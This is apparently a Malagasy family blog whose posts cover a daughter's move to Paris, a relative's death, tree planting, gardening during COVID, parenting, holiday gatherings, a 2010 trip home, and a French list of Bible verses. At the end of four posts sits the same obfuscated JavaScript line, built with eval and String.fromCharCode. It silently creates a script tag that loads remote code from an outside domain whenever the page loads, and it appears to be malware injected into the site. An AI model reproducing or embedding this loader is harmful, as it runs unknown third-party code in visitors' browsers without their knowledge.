Blaogin’ny Namana Serasera weblog

Archive for the 'Uncategorized' Category

Taona 2020 mifangaro

Tonga tsy nampoizina  i Alynah Fitiavana Landy RAJAONARISON, herintaona taorian’ny nahalasanan’i Hoby tokoa dia tonga i Alynah, tonga mameno ny banga eo aminay mianakavy kely. 

Fahatairana aloha ny ahy raha vao nolazain’i Maeva aho fa miandry vohoka izy, somary diso fanantenana kely ny amin’ny ho aviny aho, nefa moa dia nilaza izy fa safidiny ilay toe-javatra fa tsy hoe tsy nampoiziny akory. Efa lehibe tokoa izy ary dia mahalala ny mety sy tsy mety fa dia ny nanampy azy teo amin’ny lafiny ‘logistique’ sisa no anjarako, satria dia efa maty paika maty lamina daholo ny handraisany ny zanany.

Nandritra izay fotoana izay koa moa dia nisy koa ary mbola misy moa hatreto ity valan’aretina COVID19 ity izay maneran’tany tokoa ary dia mandripaka aina maro. Tsy vitsy ny namoy havana na namana akaiky ny manodidina ahy ary na ny tao anatin’ny fianakaviako azy dia nahitana izany famoizana izany ihany koa.

Afangaroko eto daholo aloha izay ato an-dohako fa efa ela aho no te hanoratra fa tsy nety tafiditra fa nisy olana kely teto, 

nandritra iny taona 2020 iny dia nifandimby ny fahazahoan-dalana mivezivezy sy ny tsy fahazahoan-dalana na ny couvre-feu, nohon’ny antony fitandrovana ny fahasalamana moa izany. Tahaka izany koa ny fahazahoana miasa, ary dia nalalaka tamiko ny fikarakarana ny zaridainako, Voadioko ny kirihitra teo an-tokontany, faly aho, ny asa tao-trano ihany koa dia nandroso niadana teo koa.

Nahavita ary nahavokatra anatsonga, anamamy dia, katsaka, ovy, voatavo karazany 3 aho ary radis, persily, kotmila, solila, haricot-vert, voatabia karazany efa ho 4 ary ireny tsy dia fihinako an-davan’andro ireny. Ny amehezako azy dia variana aho fa kay mahavokatra ny tanako rehefa ampiasaiko e…. faly aho e!

Teo ihany koa ny fikarakarana ny sakafo batemin’i Achille izay zafin’ilay namako akaiky, ny volana Avril 2020 moa izany e, faly ny nasaina, tsy nampiozin’ny vahiny satria da asatananay sy Maeva daholo ny teo, ny vahiny dia menasofina daholo, Ny mofomamy ihany no tsy asa-tananay mianaka, 

 

mbola hitohy 


No comments

Foy ny atody e!!! hary elatra ny ankizy

Ela izay,

tsy haiko hoe ahoana ny hanombohako azy, fa dia hoe hary elatra ny ankizy… mahafaoka zavatra betsaka izay,….

Ny volana novembre 2018 i Maeva no nifindra lasy tany Paris Ile de france, tsy mora anefa vao tonga t@ izany izahay, vita ny fanadinana Bacc taty Lille ny été 2018 dia nandeha naka rivotra niaraka t@ fianakaviana malagasy namanay aty Lille ho any Madagasikara izy. Nahita izany hoe tena fialan-tsasatra izany tokoa, satria dia tao Antananarivo, dia avy teo lasa tany Toamasina, ary dia nifarana tany Mahajanga ny diandry zareo t@ izay…..

Nony niverina avy tany izy dia nijerijery fianarana mety hataony aloha….. tsy tiany ny hifanerasera @ ankizy mpiara mianatra taminy taty Lille koa dia nanapa-kevitra izy fa ho any an-drenivohitra hono…. ohatran’ny nataoko izaho reniny sy ny rahavavin-dreniny izay reniny à batemy,

Rafitra aza izahay 3 mianaka nitady trano ho azy, nahita tokoa fa dia feno fitaka, ka dia tsy nidirana akory…. nahita formation tany anefa ilay zanako ka dia tsy maintsy nijanona tany ihany, ary dia tao @ Hoby izay reniny   @ batemy izy no nitoby mandra-hoe pahita trano aloha. samy tia fety izy mianaka ka dia nifankahazo tsara, fa na izany aza eo an-daniny @ maha zaza an i Maeva dia nisy ihany tsy fitovian-kevitra matetika teo à izy mianaka, toy ny fanasana lovia rehefa avy misakafo na koa ny fampirimana ny trano, na koa ny ora fodiana ao an-trano, ka matetika miantso ‘polisy’ aty Lille ny iray @ izy mianaka, dia manao mpanelanelana indray aloha ny tenako.

Indrisy anefa fa dia zara raha niray toerana izy mianaka satria dia nilaozan’i Hoby haingana loatra izahay….. lasa tsy niverina intsony izy, lasa tsy ho hay antsoina ihany koa….

Tampoka be taminay tokoa ny fahalasanany, na izaho aza tahaka ny tsy nino raha tsy nahita azy teo an-tokontaniny….. tsy hiverina @ iny intsony aho fa mbola misy fery tsy mety sitrana ao anatiko ao,Misaotra ny Tompo aho nanome azy anay nandritra izay 45 taona izay…. ny vola famangiana nomena anay dia nahatontosana zavatra maro @ anaran i Hoby, na teo anivon’ny vianakaviana na eo anivon’ny firenena … tsy hitsanga menatra ny anarany…. nahavita fambolen-kazo in 2 miantaona aho, ny voalohany dia niarahana nanatontosa niaraka t@ ireo mpanakanto tany antoerana teny @ tanindrazanay, any Amboniriana, ary ny faharoa kosa dia niarahana t@ association tetezana sy ny namana serasera Dago teny Ambohidratrimo, Maniry tsara ny eny ambanivohitra satria dia misy mpiahy, ary misy mpanondraka, raha ilaina izany, ny teny Ambohidratrimo kosa dia somary nisy ‘perte’ kely satria tsy dia nisy nanara maso nandritry ny fambolena ka dia voatery i Maminiriana mivady no nijery sy nanarina ny tsy mety volana taty aoriana, fa iriana fa haniry tsara ihany koa ireo….

Santatra ambava rano iny fa ny tanjona dia ho isan-taona dia hiaraka hamboly hazo sy handrakotra io firenentsika io i Maeva satria raha voafidy ho Miss Madagascar en France 3ème dauphine izy dia io no foto-drafitrasa nosakainy hatao. Izay no no izy satria hainy fa efa misy namana aho afaka miaraka miasa aminay eny an-toerana, ka dia manohy izay ihany izy. (efa niresaka izay ihany moa aho teo aloha)

Ankehitriny dia any  @ 92500 izy no mipetraka ary dia isaorako eram-po eran-tsaina ireo mampiantrano azy tokoa izany, tsy vitan’i Maeva mantsy ny hipetraka irery ao @ tranon’i Hoby…

(mbola hitohy)

eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


167 comments

FItaizana

Ela aho izany tsy teto,

 

Resaka rediredy @ fitaizana indray ity, mahay mitaiza ve aho?

Handray 18 taona atsy ho atsy ny zanako…..efa lehibe aho hoy izy izany foana no ambetin-teniny, inona moa no mahalaza fe lehibe ny olona iray? izaho anefa toa tsy mahatsiaro tena akory fa efa lehibe izany na dia efa mananika ny 50 taona aza, ny taona ve no hamaritana ny maha lehibe ny olona sa ny toe-tsaina sa ny toe-batany?

Fony mbola velona i neninay dia tsy nisy zavatra niafina taminy ny mahazo ahy na tsara io na ratsy,  na an-kafaliana na fahoriana, indrindra moa fa fahorian-tsaina izany, fa ny ankizy ankehitriny kosa dia mahazendana ahy fa dia izao namany izao lava hono no hifampizarany ny manjo azy, ary ny zanako manokana indray ankoatran’ny namany dia mba misy ihany koa fotoana moa natokanay hiresahana @ manaampahaizana dokotera mba hitantarany ny fiainany manokana, ka manampy azy io @ lafiny ara-batana aloha ary ara-tsaina ihany koa. Ka raha misy resaka tsy tiany ho resahana amiko dia mba milamindamin-dratsy aho fa tsy hanoro vohona azy io manam-pahaizanaa io fa anisan’ny mpanabe ihany koa ary mpitaiza, izay no asany tsinona. Tsy ahitana izany moa any @ firenentsika fa aty @ misy anay no tena ahaitana izany ka dia manararaotra mihintsy izahay mianaka noho izany, sady hitanay ihany koa fa manampy anay ilay firesahana aminy.

Tsy misakana ny fananany ny tsiambaraa-telokeliny anefa izany raha aminay mianaka maanokana, fa hafa ihany ny sain-dreny tia hahafantatra ny zava-drehetra miseho @ fiainan-janany, izay aloha ny aahy fa ny anareo no tsy haiko, sa ve izaho no zatra nahatrizao aza mitantara ny rehetra miseho @ fiainako @ i neninay???

Hatreo indray aloha ny @ iny fa tsy ho voavahako ity olana ity……eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


24 comments

2012

Tonga indray hono ny taona vao² koa dia am-pifaliana hatrany no ahatongavako eto hitantara kely ny mba fety niarahako t@ havana aman-tsakaiza e!

Ny 29/12/2011dia efa tonga ry Mr et Mme Berger, ireo moa no fandehanan’i Maeva nanao vakansy tany Soisa taloha e! fa efa nody any an-tanindrazana kosa ry zareo ary dia mandalo miserana ihany rehefa tonga aty, nandeha fiaran-dalamby izy ireo tonga taty dia faly nihaona moa izany e! vay teo moa ry zareo dia narahin’ny la famille Dalton-Rakorovao-Andrianantoandro t@ fiara, tonga t@ 19h00 tany ho any kosa ry zareo 5 mianaka ireo nandeha fiara. Nahafinaritra ny fiarahana fa na dia tsy omby aza ny farafara dia nahitana vaha olana hatrany lalandava izany

Ny 31/12 kosa no tena fiarahan’ny be sy ny maro tsy foiko taty dia ry Famille Bahl, izany ary ny Famille Delesalle ihany koa ary ny nanampy anay ireo dia ry Rasolofodera 3 mianaka, raha natambatra ny isam-batan’olona izany dia niisa ho 20 teo ho eo izahay ireo.

Nahafinaritra ny fiarahana, nihirahira sy nijerijery clip malagasy no tena natao ankoatran’ny fisakafoanana moa t@ izany, avy teo dia ni-skype niaraka t@ ndry zareo teny Ivato koa izahay,

Ny 02/01 kosa aho no nandeha nitsena an’i Maeva avy niala sasatra tany an-tanàna, tamàna ery hono izy tany ary mbola nanontany ahy hoe rahoviana indray izy no hiverina any!!!!!!

Dia tahaka izay ny fizotry ny fiandohan’ny taonanay, androany 03/01 kosa aho no nanomboka nandray asa, na dia mbola mahatsiaro vizana ihany aza.eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

hira mahafinaritra ahy

Mibebaha

http://www.dailymotion.com/video/x1kpwo_mifaly_music

Efa ela ihany izay nisy nandefa ity aho ary dia tehiriziko ato aloha

La Bible répond à toutes nos questions. Voici quelques numéros de téléphone d’urgence, pour que la Bible devienne réellement le livre de Vie dans notre quotidien.

Quand vous êtes troublés, appelez Jn 14.
Quand les hommes vous harcèlent, appelez PS 27.
Si vous voulez porter du fruit, appelez Jn 15.
Quand vous avez péché, appelez PS 51, Mt 11.28-30, Luc 15, Jean 3.16.

Quand vous êtes inquiet, appelez PS 46. Mt 6:19-34, Philippiens 4.6-7, 2 Tm 4.16-18.
Quand vous êtes en danger, appelez PS 91.
Quand Dieu semble loin, appelez PS 139.
Quand votre foi baisse, appelez Hé 11.

Quand vous vous sentez seul et effrayé, appelez PS 23.
Quand vous vous sentez batailleur et critiqueur, appelez 1 Co 13, cela vous calmera.
Pour savoir le secret de Paul concernant le bonheur, appelez Col 3.12-17.
Pour avoir une idée de ce qu’est l’état de chrétien, appelez 1 Co 5.15-19.

Quand vous vous sentez abattu et dépassé par les événements, appelez Rm 8.31.
Quand vous avez besoin de paix et de repos, appelez PS 37, Mt 11.25-30, Jn 14, Rm 5.1-5.
Quand le monde vous semble plus grand que Dieu, appelez PS 90, vous verrez qui est le plus grand.
Quand vous voulez une assurance que la vie chrétienne est la seule vraiment valable ici-bas, appelez Rm 8.1-30.

Quand vous partez en voyage ou au travail et que vous voulez être rassuré sur votre sécurité durant votre absence de votre maison, appelez PS. 27; 121; Mt 10.16-20, Lu 15.11-32.
Quand vos prières vous semblent devenir mesquines et égoïstes, appelez PS 67.
Quand vous sentez que vous vous croyez plus intelligent que Dieu pour créer des choses, appelez Es 55.

Quand vous voulez du courage pour accomplir une tâche, appelez Josué 1
Quand vous vous sentez seul dans le monde ou dans l’Eglise, appelez PS 23, Jn 14, Rm 12,2.
Quand vous pensez aux richesses, à la débauche et à la puissance, éloignez-vous-en vite, et appelez Me 10, Lu 12.13-21.

Quand vos poches sont vides, appelez PS 37.
Quand vous vous sentez abattu, appelez PS 27.
Si vous perdez confiance et amour envers les gens, appelez 1 Co 13.
Quand les gens sont peu aimables à votre égard, appelez Jn 15.

Si vous êtes découragé dans votre travail, appelez PS 126.
Si vous pensez que le monde est médiocre et petit, et que vous vous croyez assez grand pour dominer sur lui, appelez Pi 19, et il vous remettra à votre juste place.
Quand vous êtes découragés, appelez Rm 8.28-29,1 Co 15.57-58,1 Pi 4.12-13,1 Jn 3.1-3.

Quand vous vous sentez abandonné par vos amis, appelez PS 27, Mt 10.24-31, 2 Timothée 4.16-18.
Quand vous êtes en difficulté, appelez PS 16, Jn 14.1-4, Hé 7.25.
Quand vous êtes las, triste ou chagriné, appelez PS 6;27;40;55, Mt 11.28-30, Jn 14.1-4, Rm 8.31-39, Hé 12.6-13.

Quand vous êtes malade ou souffrant, appelez PS 32:91 Rm 5.3-8, 2 Co 12.9-10.
Quand vous avez peur, appelez PS 4, Me 4.35-41, Hé 13.5-8,1 Jn 4.15-19.
Quand vous êtes tenté de retomber dans le péché, appelez PS 6:51; Mt 26.33-35,69-75, Jn 21.15-22.
Quand vous vous sentez reconnaissant, appelez PS 84:92,100,103.

Quand vous vous sentez exposée la tentation, appelez PS 1;73, Je 1.12, 2 Pi 2.9.
Quand vous êtes dans l’adversité, appelez Mt 10.16-39.
Quand vous avez des problèmes avec l’amitié, appelez Jn 15.12,17.
Quand vous avez des problèmes avec la lecture de ta Bible, appelez Jn 5.39, Mt 24.35.

Quand vous êtes en colère, appelez Mt 5.22-24.
Quand vous avez besoin de compassion, appelez Lu 10.30-37.
Quand vous êtes tenté par la médisance, appelez Mt 15.11,17,20.
Quand vous avez des problèmes avec les critiques, appelez Mt 7.1-5.

Quand vous avez des problèmes avec la cupidité, appelez Mt 6.20, Lu 12.15-21.
Quand vous avez des doutes, appelez Jn 20.24-29.
Quand vous avez des problèmes avec la droiture, appelez Mt 5.20, Jn 3.13-21.
Quand vous avez des problèmes avec vos ennemis, appelez Mt 5.10,43-48.

Quand vous avez des problèmes avec l’extravagance, appelez Lu 12.16-31.
Quand vous avez des problèmes avec l’amour fraternel, appelez Jn 13.34-35.
Quand vous avez des problèmes avec la haine, appelez Mt 5.43-48.
Quand vous avez des problèmes avec l’honnêteté, appelez Lu 19.11-26.

Si vous avez des problèmes avec l’honneur dû aux parents, appelez Mt 15.4, Me 10.19.
Si vous êtes intempérants, appelez Lu 21.34-37.
Si vous avez des problèmes avec le mariage, appelez Me 10.2-12.
Si vous avez des craintes au sujet de la mort, appelez Lu 16.19-31, Jn 11.25,26.

Si vous avez des problèmes avec le pardon, appelez Mt 18.21-35, Me 11.25,26.
Quand vous avez des problèmes avec le péché et que vous voulez en être délivré, appelez Jn 8.24,34-36.
Quand vous avez des problèmes avec la prière, appelez Lu 11.1-13.
Si vous avez des problèmes avec les serments, appelez Mt 5.33-37.

Si vous voulez savoir ce qu’est la sincérité, appelez Mt 7.15-27.
Si vous avez des problèmes avec la tromperie, appelez Mt 23.27,28.
Si vous avez des problèmes avec la vanité, appelez Lu 18.9-14.
Si vous avez l’esprit de vengeance, appelez Mt 5.43-48.
Pour savoir ce qu’est la vérité, appelez Jn 14.6.eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


18 comments

Vakansy 2010

Mba niala kely ny toerana mahazatra izahay mianaka t@ ity indray mitoraka ity, mba nitody doha kely tany an-tanindrazana, Izaho moa t@ Mai 2008 no tany farany nanao ‘surprise’ ho an’i Neny ary i Maeva kosa dia efa t@ 2003 no farany tany,

Niainga taty Lille ny 05/07/2010 izahay mianaka ary natory tany Rueil malmaison, ny ampitso atoandro vao naka andra-vorombe, niaraka teny @ seranana nanatitra anay mianaka ihany koa i Hoby,

(ho tantarako ny hitako, nataoko, sy nahafinaritra, nahasorena ahy tany)

Tonga teny Ivato t@ 6/07/10 ary izahay mianaka, nahafinaritra ny fahitana ny andian’ny lehilahy nitsena anay mianaka, tsy iza moa izany fa i dada sy ny zandriko 2 lahy, ny vehivavy kosa, ny vadiny avy dia nijanona niandry anay tany an-trano, Efa tsindrian-daona ery i Maeva fa hoe misy aliaka beh ao @ ndry dadabe, matahotra fadiranovana mantsy izy, nefa dia nahafinaritra azy indray ny nahita sy nilalao an’i Bounty. hafaliana no niarahana e!

NY faran’ny herinandro manaraka indray dia niaraka tà namana serasera aho, nahafinaritra fa tany @ tokan-tranon’i Anarim no nanaovana izany, tonga tany ny namana tratra antso, tsy ny rehetra ihany koa moa no nantsoina fa izay mba mifandraika sy akaikin’ny fo ihany e!. Indreto avy no nasaina t@ izany, ry anarim mianakavy (tompon-trano), avylavitra, ravatorano, glou (prezidà), arymalala, saholy, naritsimba, lobaka, ny tsy tonga dia ry angotiko sy maina (nandeha tany Anjeva nanannn tsy teneniko fa haiko hihihi) ry mamzelkely koa no tsy tonga fa nifanindry t@ raharaham-pianakaviana, dia i tianalove hihih diso daty ikala nefa dia hainy stara fa hoe hihaona, akory atao hihihi, nahafinaritra ny fihaonana, fa ankoatran’ny fifanatsana vao² sy fahasalamana, dia nijery ny cd serasera10 taona izahay, izay mantsy ny voan-dalana nentiko ho azy ireo e! nisy ihany koa moa fitantaràna ‘dessin animé’ t@ izany hihihi, hatrany anaty bus t @izahay nody dia mbola tsy nitsahatra ny” fiomehezana party” vao tsy tapitra mantsy ny tenin’i dadatoa dia indro tonga ilay tsy nampoizinay, euuhhh tsy azoko tantaraina eto daholo hono e!!!! mba misy tsiambaratelo an’ny serasera izany e!

 

Ny herinandro manaraka an’io moa dia nivezivezy eran’Antananarivo izahay mianaka nitsidika ny havana ela tsy hita, tsy afaka nandeha alavitra fa teo ihany koa ny fanoharana akanjo tsy azo nialàna (nohon’ny hajejoana hihihi)

Ny faran’ny herinandro manaraka indray dia niaraka nihaona t@ fianakaviam-be indray izahay rehetra, izany hoe fihaonana isan-taona an’ny teraka izy io, tsy latsaka ny 80 tany ho any izahay mianakavy tafavory teo ( terak’Andrianjafy sy Ranarivao) izay avy @ dadanay ary avy @ lafin-dreniny.

Ny herinandro nanaraka an’io indray dia mbola nivezivezy ihany izahay mianaka, fa ny nahatsikaiky kely dia izao: t@ voalohany izany dia nandray bus miakatra mankany an-tanàna izahay 3 miafy vehivavy, dia ilay zanako tsy dia tena mbola mahalala tsara hoe ahoana ny fitaingenana bus, efa mitaingina bus ihany izy aty Frantsa fa ilay any an-tanàna no tsy hainy loatra, ka navelany hiditra aloha izany ny olona dia niditra izy avy teo, akory anefa ny hagagany fa tapaka hazo izay no nomen’ilay receveur azy hipetrahany,

  •  hataoko aiza ity hoy izy mantsy ahy,
  • iny no hipetrahanao ‘eto’ hoy aho namaly azy ary natoroko azy ny fametrahana ilay ‘seza’
  • haiko izay @ manaraka fa izaho no hiakatra ny fiara voalohany hoy izy

Nahafinaritra fa tsy mba nitaraina ilay zanako nandritry ny fotoana naha tany anay, variana izy ary tonga saina nahita ny mpangataka, ny loto isan-karazany ihany koa eny an-dalàna, tsy mba naharikoriko azy anefa izany, fa hoy izy hoe: ‘mampalahelo ry neny ilay olona, fa maninona raha omena vola izy dia mandeha misasa? dia omenao akanjo madio? tsy ho vitantsika izany hoy aho namaly azy, andraikitry ny fanjakana izany fa tsy antsika hoy aho, satria tsy afaka ny hanao izany @ ilona tokana isika fa tsy maintsy ho avy koa ny hafa, marina tokoa izany hoy izy, fa efa mba misy olona taizan’i dadabe sy bebe ihany ao dia ireo no anaovantsika soa izany, eny hoy aho, atomboka @ manodidina sy olona hay hoy aho ny fanarenana fa tsy atsipy ho very an-kady fotsiny.

